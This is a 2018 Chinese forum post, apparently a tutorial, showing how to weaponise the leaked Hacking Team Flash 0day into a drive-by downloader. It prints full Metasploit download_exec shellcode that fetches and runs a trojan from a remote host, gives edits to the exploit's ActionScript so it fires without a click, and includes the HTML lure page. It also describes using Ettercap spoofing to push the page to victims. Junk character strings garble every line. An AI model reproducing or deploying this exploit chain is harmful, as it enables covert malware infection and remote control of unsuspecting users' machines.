|
( z n* W2 [* a/ R/ q 三、flash 0day之手工代码修改制作下载者实例入侵演示
( l( Z. I" O( v! C) |/ \8 i
' w3 U( h% O T( T9 @! y4 c3 ]5 Y1 V1 {4 ~
利用到的工具: , k e$ [0 P8 O. Z8 C3 a5 F
) X6 }* L( ~; W
- j( D6 i1 G' b8 l( _/ [% J Msf * k- [* N+ L8 T7 ^; `( ?
7 u" T( C2 V h. T8 ]7 p" Y
' x6 H5 D* U( v1 \
Ettercap
" A' U2 }+ m$ U0 x2 l/ }2 r ( k( w$ |/ |2 W" }2 n3 s5 I
& @; i$ r$ O2 t* W3 X Adobe Flash CS6
( D) v: n1 e/ K0 G3 D2 [" r) N # ?$ V) F. m6 H, {0 g
8 _3 G5 C3 b9 K0 b) y2 J _+ J Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
5 a; O/ |; U7 d% b, I$ |8 k7 @; q8 W
* K4 M4 R3 H! W/ Q m0 u- z/ o7 X m7 X; N. K# u
下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options " y* t7 U4 O+ w" w
: `6 S3 h( [/ C) L" A+ f
& s& b. A/ i8 q' \- b5 U0 u) ` 如图: 5 n$ Z9 ?7 F5 K
2 t7 Y. e7 L" K2 T
- j: \) X; D' k8 O+ V9 I/ e" B
3 E0 r2 I* S+ v c 2 ^" s& u$ Q/ j3 s3 d5 _& b
" L( x: |# l* W' s) W, c) ? 
- t) h- B- x3 H6 @+ X, M; m
; e3 h2 |) o! Q% v* w
) [: n0 u. o. y 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: 0 [' }$ v$ K- P, C y. g& y
; i9 L' d7 l; U5 H
7 _9 [' n2 F0 R0 O9 h. c
! D: J0 D2 S4 k$ v & c2 I5 r& s1 Z: `* [; L7 r9 d
% o9 l" D1 k' z5 j* R; Z* _  , a9 H& |' `+ s, }6 p1 y3 S+ l6 N& [
/ u8 E4 D8 p1 ~" }
! J* O% G- A+ y3 O# U- K 然后执行generate -t dword生成shellcode,如下:
" d% q' D8 N) d# u# f. |+ A5 T
5 G6 ^6 Q! i. g1 f3 R( m. V8 ?! E- [4 v% ?- f# C8 L
 4 B5 A- T% v. ^ F
# @" l4 r8 l" j* R* |5 c h8 b, m
$ C5 } e, }, p9 X 复制代码到文本下便于我们一会编辑flash exp,如下:
, j- B$ S8 _/ W' G; G* w( B6 E ! Y& e& @7 o/ i8 |$ d* o T! L
: l& k! w" q) P. N
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
v- b; {! _7 g* d9 ^. A6 ` # u/ f% k7 t' A; ^( b% V G1 |
; ]/ p9 s( `$ Z
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
" {/ a/ Q2 U( q" W' ^ s8 X8 L
- ~- t2 X" Q$ |
]& t$ M4 G& z 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
3 t9 J1 I1 Q2 X0 ]! b 1 {4 r; X3 Q6 T; F5 o1 m+ @
( q% j1 h$ k4 {# _3 y$ X# s6 F' M 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 7 K3 G, k. Q6 c; m( M/ r
# \+ R( e3 W% b$ x6 G0 K2 z
- ~3 Q: r0 t+ ~9 D! i 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, / R4 }1 E+ G( g+ f$ _, h& i
! e" ], L7 C* a) @, X
' W, O$ {( V, @( y 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
& m" U' v: `: C' S G6 C0 T' b
* B% q J* ?+ `; q3 G6 N9 _+ e: ^1 S3 c1 p" H# ~
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
; h; a) q8 n. Z: P3 @ 0 E9 L0 r0 T: o) j0 r2 j h
7 G3 T" Q: ], }9 E. n
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757,
4 H2 P4 C, U% M7 E( [% z- G , h- D4 Q$ k. @- a9 f
- n, {& t! b. C1 s2 L 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, ; r3 K' g0 ?, b& m% \# \9 b0 Z
' J; x4 O) d5 o) i7 S. o* q; e% ~/ W
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
' V0 s$ a* _3 n. U- C
- D0 r2 a9 }. }: ?5 K6 Z" c6 S% ^# O, k; Q7 s! c2 {
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 6 k2 @! y* v0 x$ z2 H# o4 e3 q {
+ W: Y$ Q, V* K( W: j; g
) y6 E4 O& A. D Z7 f: w. o1 J 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
) X' W' _0 M& g1 G. ~+ q1 Q4 f
# F! J. L. x' _2 I2 c e8 d
6 ]) \9 S) {9 W 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
Q; G- i% j# w 6 w! V: I; q. f) t
; O. A4 Q5 B3 m7 ?) I$ y
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ! g3 H8 `9 l8 Z* z. n# @7 m0 _, G
+ S' G6 A! K! o- v
2 M. _ t+ u% K( i: I
0 f; [6 ^8 ?4 m
4 y1 C. M0 z" v$ G5 {- W5 S7 k! N* F% M! J: a( u, c
3 ?/ c" ~( ]; B, M; h- P8 u5 K: O ) |5 A. U1 Z6 w( c
5 I. a5 |/ p/ o# ^9 Q 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
0 D: ], G( t+ g8 a0 @3 c; J8 N 5 J ^3 R k- `7 p& d) k
5 G' J3 {/ `' {6 S
. E* u J6 S8 w4 ?2 E
1 q& q: T9 I/ _2 q$ M. G1 g" Q
, \+ h2 \& c. a: f7 X% f# H 先修改ShellWin32.as,部分源代码如图:
& |5 ]- y f+ O/ h2 R) l; R 1 ?& R3 X# ~- r. {3 q
$ n0 N6 Q7 y' Q$ M
! J9 ^% c- F/ T5 ]; S/ u
! b. ?5 u. M7 U5 i. Q' {- K# P0 u8 Q$ B2 m
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
5 V B: J% f; n- _7 j/ L 2 A' p2 I$ U* _1 ^5 }: e) r
9 }, G0 N2 \0 H9 s, O/ U 
$ j) O9 Z6 Q8 H, y$ X! m3 w* q) [! U 3 l8 V0 X6 v6 u# s- H, u6 J
" U4 F7 z0 o# v% T- N' _
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
- w5 m) y6 i' z7 ]7 O+ D y& \
6 e$ ~2 i1 d8 } l: ?1 @, M. c# ~/ y& _* Y* m, d5 T4 s! L6 g
 1 m# V' v. b+ o8 e, \$ n, b r
/ H* ~/ l, }3 ]5 P! z
, P! I- H0 \8 c# P$ p( _ 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
7 }( k' `* Z6 W7 F0 Z) T
* U3 w. T: N1 A
( Z6 k9 A) W/ v
/ f: F: s @* F" g( f; A( b + N& m. Z6 }7 y$ w7 ?
% y& E/ A$ S6 p2 o+ K! v2 a! y % y! K" Z$ F9 V+ b$ }4 C
1 ?- ?9 i# M3 x3 x" w0 F
9 I0 @; Z E2 D
 & f) K- K- q; }" E
6 D Z. v, l" K3 m- H
! |3 j& v4 T# t& G( O! m( P
然后点保存,下面我们来编译一下,打开 * S# m9 b; t" B4 I# F* H0 a
9 F# M& H! r1 F& V1 z
2 ]# n9 x8 I& S$ {8 Y exp1.fla然后点文件-发布,看看编译没错误
& y* n5 c* b$ w# Z' L 2 Y+ {) _ A2 V S. F% o
: H) a+ e/ A8 ~% V6 m# s% P7 L 2 B# n4 v9 H/ f/ M2 m
6 a R/ V+ S2 T* m3 O* E
% r; Q+ i- X l
! ^0 v. r! V5 h; y$ g& f" K l! l0 G4 c8 M C) S
3 q) D+ B1 Q/ c, B( N8 T2 r9 Z' k
6 Q* [4 V N! d; H+ y7 k4 {
1 J5 U h+ p: r: z8 S+ D( t& n2 d; G4 f" }4 |: k8 H
" s/ F' I4 j) ]9 \7 ?5 m1 e/ k
. W% i6 l1 T' I, W" ^2 v) I; `4 x3 _5 D0 [
然后我们把生成的
8 \$ E8 W {9 M
# P' L& C& w( T( ~: P
5 o( H! J6 x. n' F exp1.swf丢到kailinux 的/var/www/html下: , V* l* X$ |6 j
! s4 r0 R" d) B4 U8 C
$ S- R( {4 b* g5 y: z/ f4 n 然后把这段代码好好编辑一下
$ o0 [( C% V' @$ M& L2 c/ m7 l - x8 v0 O# |; |2 S: ?; K& A
8 n, T. W: S+ m$ Q4 l' @
# w4 A# h8 H+ i
1 m( W) V! q& S8 K; R$ `; X& y0 b2 z7 c$ ]% J& f
. e n4 I- R$ x6 r1 W& g2 u 0 D' A3 z+ ] e: J4 K
- ~/ h; j- R& C! N% H A3 v
, G- K/ J8 V: w" A7 l
6 k9 `% D7 m5 ?0 t
! Z# @/ e2 C% j! Z* g' V- h . J6 m' m% p% V5 j& w
" q; Z& G7 W+ E' s) q. `: x% p
: D1 ?/ _# {2 u2 X
0 G' o# H6 b; V o: g% c0 u
( S+ Z/ J% s4 e5 j- ]! m: x' i/ ]7 z$ A. B
% V" @- k3 K& } N
9 W; l1 s# ]- a4 ?" r# C
8 f7 _$ P* l+ i <!DOCTYPE html>
; n9 b5 {7 d- P [
& c1 G0 m7 ~" I" M8 G, T( R" ]
% H/ c6 q8 o! m/ e- n' H <html> : z; }- X' f8 L4 F
^) Y2 L4 X& q, M
' }% B {& O7 C. ~2 X <head> " B& P7 W$ Y! d9 O, R! U+ u
; T: Y* y X' U# y% Y4 ?$ p6 p9 \
$ n$ h' M: K6 r) {5 I X8 W <meta http-equiv="Content-Type" content="text/html; * G6 u$ F8 w/ f+ x! l% N
8 a) A0 @' S+ M; t
( B: y4 M, T _3 f8 n charset=utf-8"/>
2 @: }! d& ?7 q4 ]* I. t$ ^
$ i2 w/ Z- I) A' s$ [1 E0 u* y5 u# P( l% j$ {. i& N; W
</head> Z$ f7 k- R* h2 X+ u
* W8 X8 j) T5 Z% i2 \% O
0 G' |3 k& Z6 Q4 q& [4 e <body> # P7 t/ h3 w6 p
3 K$ d# A) c# V4 M; @4 w
$ n6 }, L2 u p5 H1 J <h2> Please wait, the requested page is loading...</h2> $ c( ?8 L) r0 R* s
! K2 G* d$ Q+ h2 I3 @# u' K$ x* T
2 U f3 n- ^% Z, h" g" f6 K* x6 |9 L4 e <br> 4 H; G+ t" t7 E* w9 }9 ^
( V0 s+ [- d ` M" l+ b* P- w
: A" C! _, ?8 m, G. a* t+ V <OBJECT
D. f: j( ?. Q* N1 o1 R 3 _- o1 W$ E- v2 j1 H, v
* G* t8 ?6 t$ Q0 n4 w
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie 7 U$ i. N* y! v
+ {( P; @, h: x$ u6 x8 i& e& Z( A* g* x( O8 y2 e# a, E
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> : n: t, ]' V+ |+ R; N" K
5 h9 X, h% d6 `: P4 @& s
& G. z6 d) F) x% l& s8 D </body> 8 C! C9 \8 E M, X! V' f
4 [" k( ~6 X# l) P+ u: k$ @1 p
7 e* F6 d2 b2 }' {( V# Q6 b <script> ( _6 C4 z9 g! a
: r8 C2 y5 |6 j: i! v$ x# m/ H
A+ ]& k9 u& ]# B3 R1 f setTimeout(function () { & W' |1 s7 e* d1 X" R# ]3 X
& D$ a1 w% x* G8 G: b) y7 p" k" m4 |
' ~. V0 z7 G! v9 ?1 i! Q
" P8 V6 u6 p% M4 i7 M
- A. ^7 x' A; c( _9 o+ z$ ^6 ], F
0 _8 M# G+ Z; ]8 A9 m5 r* E, G window.location.reload(); : q/ j0 W* C5 H1 n# |; C/ r
" u: ~. t- P5 Z5 q- v9 @, T- d) _
( ?0 W# J. R& U. ?4 [ }, 10000);
$ H' H3 `8 x* k: [ \4 _# ] m' w/ t# D ) z" G' @6 A! N9 e) t0 g
4 t$ f3 l$ t# G9 D$ k) I7 q" Q7 Y
8 H% ]1 w1 q7 e ( l+ K. i! S/ [$ o" w! B' `
9 V3 e" R2 {- d, p b- p; o5 p </script>
) T. W1 c( n* j
6 {% L& y% `' p4 E5 A y" K% a' T, v: @3 e5 ?
</html> % m4 P N" }3 z, P$ U
, s! C/ [) ~" s4 N
+ @% v) z7 l) w
" b* l$ |; u2 ]" V : f7 u2 g/ a, k+ a3 I7 ], h* r+ X
5 A9 L7 ~! t, K R3 E% ] 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
4 b3 }- B& q" |$ O 4 j6 S& \9 w' L
0 p, ?+ a8 ~4 n0 g0 a! R: { 
% g7 I$ j0 n( v8 U; J, `+ S/ Q; a" V
- V6 `. M/ L& Y5 A, K U. d4 j9 k2 G" }; Q
; [* Y& D* m2 x6 b
, n, ^, F5 R( E
9 V+ o4 Z% I- U8 y" [7 i. T5 K . _! `0 d# Y0 o n: V/ g0 g! G8 _
6 O" f2 ~$ l+ z* r; T$ `
8 ?% d$ \' B! c8 `9 g: M 5 E/ F- Z' N% ]& O! N
* _. {+ P$ b9 [
( O( m8 B6 n. D2 w0 o 7 b5 ~! a% J: i6 F5 ?: U* i8 j2 C
1 R; ]4 `4 W* n# F4 } ^1 b x
( A7 P, _2 v4 r. G( `7 {4 s
下面我们用ettercap欺骗如图: % _; G2 ~( L( c0 H% Q* G2 C
" z L7 k% G9 y8 D+ Q) C
) z) t2 I" a/ f2 `  : k. K! {3 G0 l) j
0 ?0 O$ S$ C9 d5 E- Y7 r2 N- m/ ^# w: d1 W! Q& K
6 ^$ B# j: e2 [1 r9 S8 x; d 4 C l( f/ j9 l. l
# {% s* ~8 W0 s 下面我们随便访问个网站看看: & h! H0 Y: v L# l# N1 L$ K
! y& O) D2 {4 X9 x% b: U3 R
0 f- ?/ W( b; a- @( h3 B+ c 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: 6 }! j C, [7 r+ O5 Z
! b1 H, L3 G5 v0 {7 C" X
% e* c9 ^5 l% M( W8 y% k U8 y8 g7 E
 X) I* l! v/ l. ]
6 g0 r3 k" `; K9 j9 B/ ]: K
$ U4 |4 U% r8 L7 x! B6 u) W 我们看另一台,
' a* L+ y6 B3 r% T' `' }- t3 @
4 t1 R* k6 E4 {1 `. m) O
9 j. X2 f8 z8 A# ^* l 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
9 v2 w) n5 a) J2 C) A Z. N | 
发表于 2018-10-20 20:28:55
收藏
支持
反对